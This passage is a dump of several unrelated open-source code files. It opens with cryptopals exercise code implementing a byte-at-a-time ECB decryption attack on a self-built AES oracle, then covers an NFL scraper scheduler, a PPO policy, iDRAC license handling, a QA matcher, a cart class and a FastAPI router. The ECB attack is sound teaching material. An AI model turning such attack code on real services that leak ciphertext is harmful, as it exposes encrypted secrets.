gen_ECB_oracle(full_code, rand_prefix=0):\n \"\"\"Return an ECB oracle function with set of fixed parameters.\n Args\n full_code: bytearray of bytes to encrypt\n rand_prefix: int of max number of rand bytes to prefix, default 0\n Returns\n parameterized ECB encryption function\n \"\"\"\n key = gen_rand_key()\n\n def call_encrypt(text, code=full_code):\n \"\"\"Call ECB encryption with given code to append and fixed key.\"\"\"\n if rand_prefix:\n length = random.SystemRandom().randint(0, rand_prefix)\n prefix = gen_rand_key(length)\n else:\n prefix = bytearray()\n return encrypt_ECB_CBC(text, True, True, (prefix, code), key)\n return call_encrypt\n\ndef repeated_blocks(blocks, threshold=2):\n \"\"\"Return True if the count of duplicate blocks exceeds the threshold.\"\"\"\n blocks_list = [str(block) for block in blocks]\n blocks_set = set(blocks_list)\n return len(blocks_list) - len(blocks_set) > threshold\n\ndef detect_ECB(encrypt):\n \"\"\"Return True if given function encrypts with ECB, else False.\n Check for repeated blocks given deterministic input.\n \"\"\"\n text = bytearray('A' * 100)\n code = encrypt(text)\n blocks = gen_blocks(code)\n return True if repeated_blocks(blocks, 3) else False\n\n# ECB Attack\n\ndef blocks_aligned(code, block_len, max_rand):\n \"\"\"Check if code contains repeating blocks.\n Code contains max_rand number of random bytes as prefix; check if the\n prefix happens to be divisible by the block length, which can be observed by\n repeating blocks immediately following the prefix. 
Return first index\n following repeating blocks if available, else None.\n \"\"\"\n start1, start2, start3 = 0, 0 + block_len, 0 + (block_len * 2)\n aligned = False\n while start1 < max_rand + block_len:\n fst = code[start1: start2]\n snd = code[start2: start3]\n third = code[start3: start3 + block_len]\n # check for collision against randomly generated prefix\n if fst == snd and snd != third:\n aligned = True\n break\n else:\n start1, start2, start3 = start2, start3, start3 + block_len\n\n return start3 if aligned else None\n\ndef smart_oracle(oracle, text, code, block_len, max_rand):\n \"\"\"Call oracle normally, or repeatedly call oracle in case of random prefix.\n Returns \"clean\" oracle output regardless of whether the oracle adds a\n random prefix.\n \"\"\"\n if not max_rand:\n return oracle(text, code) if code else oracle(text)\n\n # append arbitrary bytes unlikely to occur in attacker-controlled plaintext\n text_mod = bytearray([7] * block_len * 2) + text\n success = False\n while not success:\n encrypted = oracle(text_mod, code) if code else oracle(text_mod)\n text_start = blocks_aligned(encrypted, block_len, max_rand)\n if text_start is not None:\n success = True\n\n return encrypted[text_start:]\n\ndef gen_ECB_guesses(oracle, short, block_len, max_rand):\n \"\"\"Generate all possible full blocks given oracle and short block.\"\"\"\n guesses = {}\n for n in xrange(256):\n code = smart_oracle(oracle, short + bytearray([n]), [],\n block_len, max_rand)\n guesses[str(code[:16])] = bytearray([n])\n return guesses\n\ndef decrypt_ECB_block(oracle, block_len, block, max_rand=0):\n \"\"\"Brute-force decrypt ECB block using oracle.\n Assume there may be max_rand number of random bytes prepended in oracle.\n Args\n oracle: function, ECB oracle\n block_len: int, length of cipher block\n block: bytearray of code block to decrypt\n max_rand: int, maximum number of random bytes prefixed by oracle\n Returns\n bytearray of plaintext block\n \"\"\"\n guess = bytearray('A' * block_len)\n for ind in xrange(block_len):\n short = guess[1:]\n target = smart_oracle(oracle, short, block[ind:], block_len, max_rand)\n guesses = gen_ECB_guesses(oracle, short, block_len, max_rand)\n found_byte = guesses[str(target[:16])]\n guess = guess[1:] + found_byte\n\n return guess\n\ndef decrypt_oracle_ECB(oracle, block_len, code, max_rand=0):\n \"\"\"Perform byte-at-a-time ECB decryption with given oracle.\n Args\n oracle: function, ECB oracle\n block_len: int, length of cipher block\n code: bytearray, ciphertext\n max_rand: int, max number of random bytes prefixed by oracle\n Returns\n bytearray of plaintext\n \"\"\"\n plaintext = bytearray()\n block, rest = code[:block_len], code[block_len:]\n\n while block or rest:\n decrypted = decrypt_ECB_block(oracle, block_len, block, max_rand)\n plaintext += decrypted\n block, rest = rest[:block_len], rest[block_len:]\n\n return plaintext[:len(code)]\n\n# tests\n\ndef test_ECB_symmetry():\n \"\"\"Test ECB encrypt -> decrypt yields original.\"\"\"\n text = 'test' * 16\n key = gen_rand_key()\n AES_key = AES.new(str(key), AES.MODE_ECB)\n\n cipher = apply_ECB('encrypt', text, AES_key)\n plain = apply_ECB('decrypt', cipher, AES_key)\n assert text == plain\n\n return True\n\ndef test_CBC_symmetry():\n \"\"\"Test CBC encrypt -> decrypt yields original\"\"\"\n text = bytearray('test' * 16)\n key = gen_rand_key()\n iv = gen_rand_key()\n\n cipher = apply_CBC('encrypt', text, key, iv)\n plain = apply_CBC('decrypt', cipher, key, iv)\n assert text == plain\n\n return True\n\ndef 
test_blocks_aligned():\n \"\"\"Test blocks_aligned() function.\"\"\"\n sample = 'ABCD' + 'WXYZ' + 'WXYZ' + 'ABC' * 10\n assert blocks_aligned(sample, 4, 4) == 12\n assert blocks_aligned(sample, 2, 2) is None\n assert blocks_aligned(sample, 3, 9) is None\n assert blocks_aligned(sample, 3, 10) is None\n\n return True\n","repo_name":"tkuriyama/cryptopals","sub_path":"set2/python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"14641943970","text":"from populateFirebase import updateWeek\nfrom utilities.getTodayInfo import getTodayInfo\nimport json\nfrom populateFirebase import populateFirebase\nfrom processStats import processStats\nfrom scrapeToJSON import scrapeToJSON\nfrom scrapeLiveScores import scrapeLiveScores\nfrom setPickable import setPickable\n\n# Weekly Schedule:\n# Tuesday @ 3:30am buildProgramSchedule will be run as the last scheduled event from the previous week\n# It will run and programSchedule.txt will be filled out with schedule information for the coming week\n\n### Program Execution:\ndef buildProgramSchedule(dateInfo):\n # immediately call scrapeToJSON to ensure up-to-date schedule information for the coming week\n scrapeToJSON(dateInfo)\n processStats(dateInfo)\n populateFirebase(dateInfo)\n\n # directly call updateWeek() to enable picking for the next week's games.\n updateWeek(dateInfo)\n setPickable(True)\n\n # Then scrape live scores to capture any odds information for the upcoming week\n scrapeLiveScores(dateInfo)\n\n # create a variable to hold the new schedule\n newSchedule = []\n\n # open the JSON schedule and get the start times of all games\n schedule_target_file = 'data/schedules/'+str(dateInfo['season'])+'.json'\n seasonFile = open(schedule_target_file)\n schedJSON = json.load(seasonFile)\n currWeek = schedJSON['status']['currentWeek'].split(\"-\")[1]\n gameStartTimes = [int(schedJSON[currWeek][matchup]['date']+schedJSON[currWeek][matchup]['time']+'00') for matchup in schedJSON[currWeek]]\n gameStartTimes = list(dict.fromkeys(gameStartTimes)) # De-dupe list\n gameStartTimes.sort() # Sort the list\n gameEndTimes = [time+43000 for time in gameStartTimes] # Derive a list of end times\n\n # Merge the time-windows if they overlap\n gameTimeWindows = []\n for idx, sTime in enumerate(gameStartTimes):\n eTime = gameEndTimes[idx]\n if idx == 0:\n gameTimeWindows.append([sTime, eTime])\n else:\n if sTime < gameTimeWindows[-1][1]:\n gameTimeWindows[-1][1] = eTime\n else: \n gameTimeWindows.append([sTime, eTime])\n \n\n\n # Beginning now, schedule scrapeLiveScores() every 2 hours until the first game's kickoff\n runTime = int(dateInfo['timestr'])\n schedTime = gameTimeWindows[0][0] - 500 # make last update 5 minutes prior to kickoff\n # correct for base-60 subtraction issues\n pref = str(schedTime)[0:10]\n mins = str(schedTime)[10:-2]\n secs = str(schedTime)[-2:]\n if int(mins) > 59:\n mins = str(int(mins) - 40).zfill(2)\n schedTime = int(pref+mins+secs)\n # actually run the loop and fill out the schedule\n while schedTime >= runTime:\n newSchedule.insert(0, str(schedTime)+'---makeVegasPicks')\n newSchedule.insert(0, str(schedTime)+'---scrapeLiveScores')\n schedTime = schedTime-20000\n # Correct for base-60 weirdness\n year = str(schedTime)[0:4]\n mnth = str(schedTime)[4:6]\n days = str(schedTime)[6:8]\n hour = str(schedTime)[8:10]\n mins = str(schedTime)[10:12]\n secs = str(schedTime)[12:]\n # check for various rollover scenarios\n if 
int(hour) > 24:\n hour = str(int(hour) - 76).zfill(2)\n if int(days) < 1:\n maxDays = 31\n if int(mnth)-1 in [9,11]: maxDays = 30\n days = str(maxDays).zfill(2)\n mnth = str(int(mnth) - 1).zfill(2)\n if int(mnth) < 1:\n mnth = \"12\"\n year = str(int(year) - 1)\n schedTime = int(year+mnth+days+hour+mins+secs)\n\n\n # Schedule setPickable() to be called exactly when the first game starts to disallow picking after the games start\n newSchedule.append(str(gameTimeWindows[0][0])+\"---setPickable False\")\n\n # Set a var to hold the scrape time\n finalScrape = None\n\n # Loop over each game-window\n for window in gameTimeWindows:\n currTime = window[0]\n endTime = window[1]\n while currTime < window[1]:\n # Schedule scrapeLiveScores() every 15 seconds within each window\n newSchedule.append(str(currTime)+\"---scrapeLiveScores\")\n currTime += 15\n # correct for base-60 weirdness\n pref = str(currTime)[0:8]\n hour = str(currTime)[8:-4]\n mins = str(currTime)[10:-2]\n secs = str(currTime)[-2:]\n if int(secs) > 59:\n secs = str(int(secs) - 60).zfill(2)\n mins = str(int(mins) + 1).zfill(2)\n if int(mins) > 59:\n mins = str(int(mins) - 60).zfill(2)\n hour = str(int(hour) + 1).zfill(2)\n currTime = int(pref+hour+mins+secs)\n # Schedule scrapeToJSON() 8 hours after the window closes\n scrapeTime = endTime+80000\n year = str(scrapeTime)[0:4]\n mnth = str(scrapeTime)[4:6]\n days = str(scrapeTime)[6:8]\n hour = str(scrapeTime)[8:10]\n mins = str(scrapeTime)[10:12]\n secs = str(scrapeTime)[12:]\n # check for various rollover scenarios\n if int(hour) > 24:\n hour = str(int(hour) - 24).zfill(2)\n days = str(int(days) + 1).zfill(2)\n maxDays = 31\n if int(mnth) in [9,11]: maxDays = 30\n if int(days) > maxDays:\n days = \"01\"\n mnth = str(int(mnth) + 1).zfill(2)\n if int(mnth) > 12:\n mnth = \"01\"\n year = str(int(year) + 1)\n scrapeTime = year+mnth+days+hour+mins+secs\n finalScrape = scrapeTime\n newSchedule.append(str(scrapeTime)+\"---scrapeToJSON\")\n newSchedule.append(str(scrapeTime)+\"---processStats\")\n newSchedule.append(str(scrapeTime)+\"---populateFirebase\")\n\n # check if it is the final week\n if int(dateInfo['weekID'].split('-')[1].replace('week','')) != 18:\n # add a line to schedule this program to run again in a week\n newSchedule.append(str(finalScrape)+\"---buildProgramSchedule\")\n\n with open('programSchedule.txt', 'w') as f:\n for line in newSchedule:\n f.write(f\"{line}\\n\")\n\n# di = getTodayInfo()\n# buildProgramSchedule(di)","repo_name":"Chucksef/NFLScrape","sub_path":"buildProgramSchedule.py","file_name":"buildProgramSchedule.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34995971460","text":"\nimport torch\nimport torch.nn as nn\n\nfrom tensordict.tensordict import TensorDict\nfrom torchrl.envs import EnvBase\n\nfrom rl4co.models.nn.graph.gat import GraphAttentionEncoder\nfrom rl4co.models.nn.utils import get_log_likelihood\nfrom rl4co.models.zoo.amppo.decoder import PPODecoder\nfrom rl4co.utils.pylogger import get_pylogger\n\nlog = get_pylogger(__name__)\n\n\nclass PPOAttentionModelPolicy(nn.Module):\n def __init__(\n self,\n env: EnvBase,\n encoder: nn.Module = None,\n decoder: nn.Module = None,\n embedding_dim: int = 128,\n num_encoder_layers: int = 3,\n num_heads: int = 8,\n normalization: str = \"batch\",\n mask_inner: bool = True,\n use_native_sdpa: bool = False,\n force_flash_attn: bool = False,\n train_decode_type: str = \"sampling\",\n val_decode_type: str = 
\"greedy\",\n test_decode_type: str = \"greedy\",\n **unused_kw,\n ):\n super(PPOAttentionModelPolicy, self).__init__()\n if len(unused_kw) > 0:\n log.warn(f\"Unused kwargs: {unused_kw}\")\n\n self.env = env\n\n self.encoder = (\n GraphAttentionEncoder(\n num_heads=num_heads,\n embedding_dim=embedding_dim,\n num_layers=num_encoder_layers,\n env=self.env,\n normalization=normalization,\n use_native_sdpa=use_native_sdpa,\n force_flash_attn=force_flash_attn,\n )\n if encoder is None\n else encoder\n )\n\n self.decoder = (\n PPODecoder(\n env,\n embedding_dim,\n num_heads,\n mask_inner=mask_inner,\n force_flash_attn=force_flash_attn,\n )\n if decoder is None\n else decoder\n )\n\n self.train_decode_type = train_decode_type\n self.val_decode_type = val_decode_type\n self.test_decode_type = test_decode_type\n\n def forward(\n self,\n td: TensorDict,\n phase: str = \"train\",\n return_action: bool = False,\n return_entropy: bool = False,\n given_actions: torch.Tensor = None,\n **decoder_kwargs,\n ) -> dict:\n # Encode inputs\n embeddings, _ = self.encoder(td)\n\n # Get decode type depending on phase\n if decoder_kwargs.get(\"decode_type\", None) is None:\n decoder_kwargs[\"decode_type\"] = getattr(self, f\"{phase}_decode_type\")\n\n # Main rollout: autoregressive decoding\n log_p, actions, td_out = self.decoder(\n td, embeddings, given_actions=given_actions, **decoder_kwargs\n )\n\n # Log likelihood is calculated within the model since returning it per action does not work well with\n ll = get_log_likelihood(\n log_p, actions, td_out.get(\"mask\", None), return_sum=False\n )\n\n out = {\n \"reward\": td_out[\"reward\"],\n \"log_likelihood\": ll, # [batch, decoder steps]\n }\n\n if given_actions is not None:\n selected_log_p = get_log_likelihood(\n log_p, given_actions, td_out.get(\"mask\", None), return_sum=False\n )\n assert selected_log_p.isfinite().all(), \"Log p is not finite\"\n out[\"selected_log_p\"] = selected_log_p # [batch, decoder steps]\n\n if return_action:\n out[\"actions\"] = actions # [batch, decoder steps]\n\n if return_entropy:\n # log_p [batch, decoder steps, num nodes]\n log_p = torch.nan_to_num(log_p, nan=0.0)\n entropy = -(log_p.exp() * log_p).sum(dim=-1) # [batch, decoder steps]\n entropy = entropy.sum(dim=1) # [batch] -- sum over decoding steps\n assert entropy.isfinite().all(), \"Entropy is not finite\"\n out[\"entropy\"] = entropy\n\n return out\n","repo_name":"mhjang/rl4co","sub_path":"rl4co/models/zoo/amppo/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"37228983501","text":"import os\nimport re\nimport time\nimport xml.etree.ElementTree as ET\nfrom enum import Enum\nfrom datetime import datetime\nfrom omsdk.sdkprint import PrettyPrint\nfrom omsdk.sdkcenum import EnumWrapper, TypeHelper\nfrom omsdk.lifecycle.sdklicenseapi import iBaseLicenseApi\nfrom omdrivers.lifecycle.iDRAC.iDRACConfig import LicenseApiOptionsEnum\nimport base64\nimport sys\nimport logging\n\n\nlogger = logging.getLogger(__name__)\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\ntry:\n from pysnmp.hlapi import *\n from pysnmp.smi import *\n PySnmpPresent = True\nexcept ImportError:\n PySnmpPresent = False\nfrom omdrivers.enums.iDRAC.iDRACEnums import *\n\nclass iDRACLicense(iBaseLicenseApi):\n def __init__(self, entity):\n if PY2:\n super(iDRACLicense, self).__init__(entity)\n else:\n super().__init__(entity)\n self._job_mgr = entity.job_mgr\n 
self._config_mgr = entity.config_mgr\n self._license_fqdds = []\n\n def _get_license_json(self):\n if not hasattr(self, 'license') or \"License\" not in self.license:\n self.license = {}\n self.entity._get_entries(self.license, iDRACLicenseEnum)\n if \"LicensableDevice\" in self.license:\n entries = self.license[\"LicensableDevice\"]\n if isinstance(entries, dict):\n entries = [entries]\n for entry in entries:\n self._license_fqdds.append(entry[\"FQDD\"])\n return self.license\n\n def _get_license_text(self, entitlementId):\n retVal = self.entity._export_license(id = entitlementId)\n ltext = self.entity._get_field_from_action(retVal,\n \"Data\", \"ExportLicense_OUTPUT\", \"LicenseFile\")\n if ltext:\n retVal['License'] = base64.b64decode(ltext).decode(\"utf-8\")\n return retVal\n\n def _save_license_text(self, entitlementId, folder):\n retVal = self._get_license_text(entitlementId)\n with open(os.path.join(folder, entitlementId), \"wb\") as output:\n output.write(retVal['License'].encode('UTF-8'))\n output.flush()\n return os.path.join(folder,entitlementId)\n\n def export_license(self, folder):\n expLic = []\n if not os.path.exists(folder):\n os.makedirs(folder)\n elif not os.path.isdir(folder):\n # replace with exception\n return []\n\n self._get_license_json()\n if not \"License\" in self.license:\n # replace with exception\n return []\n\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n expLic.append(self._save_license_text(entitlementId, folder))\n return expLic\n\n def export_license_share(self, license_share_path):\n self._get_license_json()\n if not \"License\" in self.license:\n return { \"l\" : False }\n\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n retval = { 'Status':'Success', 'Exported' : 0, 'Failed to Export' : 0 }\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n rjson = self.entity._export_license_share(share = license_share_path,\n creds = license_share_path.creds, id = entitlementId)\n rjson = self._job_mgr._job_wait(rjson['Message'], rjson)\n if rjson['Status'] == 'Success':\n retval['Exported'] += 1\n else:\n retval['Failed to Export'] += 1\n if retval['Exported'] == 0 and retval['Failed to Export'] > 0:\n retval['Status'] = 'Failed'\n\n return retval\n\n def _import_license_fqdd(self, license_file, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n if not os.path.exists(license_file) or not os.path.isfile(license_file):\n logger.debug(license_file + \" is not a file!\")\n return False\n content = ''\n with open(license_file, 'rb') as f:\n content = f.read()\n content = bytearray(base64.b64encode(content))\n for i in range(0, len(content)+65, 65):\n content[i:i] = '\\n'.encode()\n\n return self.entity._import_license(fqdd=fqdd, \n options=options, file=content.decode())\n\n def _import_license_share_fqdd(self, license_share_path, fqdd=\"iDRAC.Embedded.1\", options=LicenseApiOptionsEnum.NoOptions):\n self._get_license_json()\n if not \"License\" in self.license:\n return False\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n retval = { 'Status':'Success', 'Imported' : 0, 'Failed to Import' : 0 }\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n rjson = self.entity._import_license_share(share=license_share_path, \n creds = license_share_path.creds, name=\"Import\",\n fqdd=fqdd, options=options)\n rjson = 
self._job_mgr._job_wait(rjson['Message'], rjson)\n logger.debug(PrettyPrint.prettify_json(rjson))\n if rjson['Status'] == 'Success':\n retval['Imported'] += 1\n else:\n retval['Failed to Import'] += 1\n if retval['Imported'] == 0 and retval['Failed to Import'] > 0:\n retval['Status'] = 'Failed'\n\n return retval\n\n def _replace_license_fqdd(self, license_file, entitlementId, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n if not os.path.exists(license_file) or not os.path.isfile(license_file):\n logger.debug(license_file + \" is not a file!\")\n return False\n content = ''\n with open(license_file) as f:\n content = f.read()\n\n return self.entity._replace_license(id = entitlementId, \n fqdd=fqdd, options = options, file=content)\n\n def _delete_license_fqdd(self, entitlementId, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n return self.entity._delete_license(id = entitlementId, \n fqdd=fqdd, options=options)\n\n @property\n def LicensableDeviceFQDDs(self):\n self._get_license_json()\n return self._license_fqdds\n\n @property\n def LicensableDevices(self):\n self._get_license_json()\n return list(self._config_mgr._fqdd_to_comp(self._license_fqdds))\n\n @property\n def Licenses(self):\n self._get_license_json()\n return self.license[\"License\"]\n\n def import_license(self, license_file, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._import_license_fqdd(license_file, fqdd = fqddlist[0], options = options)\n\n def import_license_share(self, license_share_path, component=\"iDRAC\", options=LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._import_license_share_fqdd(license_share_path, fqdd = fqddlist[0], options = options)\n\n def replace_license(self, license_file, entitlementId, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._replace_license_fqdd(license_file, entitlementId, fqdd = fqddlist[0], options = options)\n\n def delete_license(self, entitlementId, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._delete_license_fqdd(entitlementId, fqdd = fqddlist[0], options = options)\n","repo_name":"akaushik-vm/omsdk","sub_path":"omdrivers/lifecycle/iDRAC/iDRACLicense.py","file_name":"iDRACLicense.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25049349369","text":"import json\nimport numpy as np\nimport time\nimport jieba\nfrom jieba import analyse\nimport os\n\n\ndef create_vec_dict(file_path):\n file = open(file_path, \"r\")\n lines = file.readlines()\n vecs_dic = {}\n for line in lines:\n li = line.strip().split()\n vec = [float(ele) for ele in li[1:]]\n vecs_dic[li[0]] = vec\n return vecs_dic\n\ndef sent2vec(sent, vecs_dic):\n \"Turn a sentence into a vector.\"\n sent_vecs = []\n tokenizer = jieba.dt\n words = tokenizer.cut(sent.strip())\n words_set = set(words)\n word_weight_dic = {}\n for word in words_set:\n word_weight_dic[word] = 1\n word_weight_pairs = analyse.extract_tags(sent, withWeight=True)\n for word_weight in 
word_weight_pairs:\n word = word_weight[0]\n weight = word_weight[1]\n word_weight_dic[word] = weight\n for key in word_weight_dic.keys():\n try:\n weighted_vec = np.array(vecs_dic[key])*word_weight_dic[key]\n sent_vecs.append(weighted_vec)\n except:\n sent_vecs.append(np.zeros(300))\n vec = np.sum(sent_vecs, axis=0)\n return vec\n\ndef main_cache(file_path,vecs_dic):\n file = open(file_path, \"r\")\n lines = file.readlines()\n vecs = []\n l2_norms = []\n answers = []\n questions = []\n for line in lines:\n dic = eval(line.strip())\n question = dic['question']\n vec = sent2vec(question,vecs_dic)\n l2_norm = np.linalg.norm(vec)\n # When l2_norm == 0 the cosine similarity cannot be computed, so skip such questions and move on to the next one\n if l2_norm == np.zeros(1)[0]:\n continue\n vecs.append(vec)\n l2_norms.append(l2_norm)\n answers.append(dic['answers'])\n questions.append(question)\n vecs = np.mat(vecs)\n l2_norms = np.array(l2_norms)\n return vecs, l2_norms, answers, questions\n\ndef compute_similarities(mat, vec, denominators):\n '''\n Calculate the cosine similarities between the input question\n and the questions already in the cache.\n '''\n mat1 = np.reshape(vec, (300,1))\n mat1 = np.mat(mat1)\n numerators = np.matmul(mat, mat1)\n similarities = []\n numerators = np.reshape(numerators, (numerators.shape[0],))\n similarities = numerators/denominators\n return similarities\n\ndef semantics_matching(question):\n startPoint = time.time()\n vec = sent2vec(question, vecs_dic)\n denominators = np.linalg.norm(vec)*l2_norms\n similarities = compute_similarities(vecs, vec, denominators)\n index = np.argmax(similarities)\n similarities = np.array(similarities)\n # print (type(similarities))\n # print (similarities[0])\n score = similarities[0][index]\n endPoint = time.time()\n print ('The process time is: ', str(endPoint-startPoint))\n return questions[index], answers[index], score\n\n'''que1 = '广州有什么好玩的?'\nque2 = '端午节是为了纪念谁?'\nque3 = '中华人民共和国在哪一年成立?'\nque4 = '范冰冰的身高是?'\nque5 = '“认识你自己”是哪位哲学家说的?'\n\nque6 = '资本论的作者是?'\nque7 = '商鞅是怎么死的?'\n\nque8 = '阿胶的制作方法?'\nque9 = '黄家驹的作品有哪些?'\nque10 = '刘亦菲主演过哪些电视剧?'\n'''\n\nCN_EN_QA_DATA_PATH = os.getenv('CN_EN_QA_DATA_PATH')\nbaike_vectors_path = os.path.join(CN_EN_QA_DATA_PATH, 'baidubaike')\nbaidu_factoids_path = os.path.join(CN_EN_QA_DATA_PATH, 'baidu_factoid_qa_pairs.json')\nvecs_dic = create_vec_dict(baike_vectors_path)\nvecs, l2_norms, answers, questions = main_cache(baidu_factoids_path, vecs_dic)\n\n'''ques = [que1, que2, que3, que4, que5, que6, que7, que8, que9, que10]\nfor que in ques:\n similar_question, ans, score = semantics_matching(que)\n # print ('The most similar question to the input question is: ', similar_question)\n # print ('The answers are: ', ans)\n print ('The score for the answer is: ', score)\n'''\n\n\n\n\n\n","repo_name":"sfhong2019/china_drqa","sub_path":"CN_EN_qa/utlis/simQA/SIM_MATCH.py","file_name":"SIM_MATCH.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"34535327710","text":"from product import Product\n\n\nclass CartIter:\n def __init__(self, products, quantities):\n self.__products = products\n self.__quantities = quantities\n self.index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index < len(self.__products):\n self.index += 1\n return self.__products[self.index - 1], self.__quantities[self.index - 1]\n raise StopIteration()\n\n\nclass Cart:\n def __init__(self):\n self.products = []\n self.quantities = []\n\n def add_product(self,\n 
product: Product,\n quantity: int | float):\n if not isinstance(product, Product):\n raise TypeError('Error in Product datatype')\n elif not isinstance(quantity, int | float):\n raise TypeError('Error in quantity of Product')\n elif quantity <= 0:\n raise ValueError('Quantity must be > 0, but got a value <= 0.')\n self.products.append(product)\n self.quantities.append(quantity)\n\n def total(self):\n summa = 0\n for product, quantity in zip(self.products, self.quantities):\n summa += product.price * quantity\n return summa\n\n def __getitem__(self, index):\n if isinstance(index, int):\n if 0 <= index < len(self.products):\n return self.products[index]\n raise IndexError(\"Index out of range\")\n\n if isinstance(index, slice):\n start = 0 if index.start is None else index.start\n stop = len(self.products) if index.stop is None else index.stop\n step = 1 if index.step is None else index.step\n\n tmp = []\n if start < 0 and stop > len(self.products):\n raise IndexError\n for i in range(start, stop, step):\n tmp.append(self.products[i])\n return tmp\n\n def __len__(self):\n return len(self.products)\n\n\n def __iter__(self):\n return CartIter(self.products, self.quantities)\n\n def __str__(self):\n res = ''\n for product, quantity in zip(self.products, self.quantities):\n res += f'{product} x {quantity} = {product.price * quantity}$ \\n'\n return res\n","repo_name":"leprikon8888/products","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"24943581426","text":"from typing import List\n\nfrom fastapi import APIRouter, status, Depends, HTTPException, Response\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.future import select\n\nfrom models.artigo_model import ArtigoModel\nfrom models.usuario_model import UsuarioModel\nfrom schemas.artigo_schema import ArtigoSchema\nfrom core.deps import get_session, get_current_user\n\n\nrouter = APIRouter()\n\n\n# POST Artigo\n@router.post('/', status_code=status.HTTP_201_CREATED, response_model=ArtigoSchema)\nasync def post_artigo(artigo: ArtigoSchema, usuario_logado: UsuarioModel = Depends(get_current_user), db: AsyncSession = Depends(get_session)):\n novo_artigo: ArtigoModel = ArtigoModel(\n titulo=artigo.titulo, descricao=artigo.descricao, url_fonte=artigo.url_fonte, usuario_id=usuario_logado.id)\n\n db.add(novo_artigo)\n await db.commit()\n\n return novo_artigo\n\n\n# GET Artigos\n@router.get('/', response_model=List[ArtigoSchema])\nasync def get_artigos(db: AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(ArtigoModel)\n result = await session.execute(query)\n artigos: List[ArtigoModel] = result.scalars().unique().all()\n\n return artigos\n\n\n# GET Artigo\n@router.get('/{artigo_id}', response_model=ArtigoSchema, status_code=status.HTTP_200_OK)\nasync def get_artigo(artigo_id: int, db: AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id)\n result = await session.execute(query)\n artigo: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo:\n return artigo\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n\n\n# PUT Artigo\n@router.put('/{artigo_id}', response_model=ArtigoSchema, status_code=status.HTTP_202_ACCEPTED)\nasync def put_artigo(artigo_id: int, artigo: ArtigoSchema, db: AsyncSession = Depends(get_session), 
usuario_logado: UsuarioModel = Depends(get_current_user)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id)\n result = await session.execute(query)\n artigo_up: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo_up:\n if artigo.titulo:\n artigo_up.titulo = artigo.titulo\n if artigo.descricao:\n artigo_up.descricao = artigo.descricao\n if artigo.url_fonte:\n artigo_up.url_fonte = artigo.url_fonte\n if usuario_logado.id != artigo_up.usuario_id:\n artigo_up.usuario_id = usuario_logado.id\n\n await session.commit()\n\n return artigo_up\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n\n\n# DELETE Artigo\n@router.delete('/{artigo_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_artigo(artigo_id: int, db: AsyncSession = Depends(get_session), usuario_logado: UsuarioModel = Depends(get_current_user)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id).filter(\n ArtigoModel.usuario_id == usuario_logado.id)\n result = await session.execute(query)\n artigo_del: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo_del:\n await session.delete(artigo_del)\n await session.commit()\n\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n","repo_name":"guniversityBR/gufapi","sub_path":"api/v1/endpoints/artigo.py","file_name":"artigo.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"74517637712","text":"import numpy as np\n\nfrom .ancillary_feature import AncillaryFeature\n\n\ndef compute_area_ratio(mm):\n valid = mm[\"area_msd\"] != 0\n out = np.nan * np.ones(len(mm), dtype=float)\n return np.divide(mm[\"area_cvx\"], 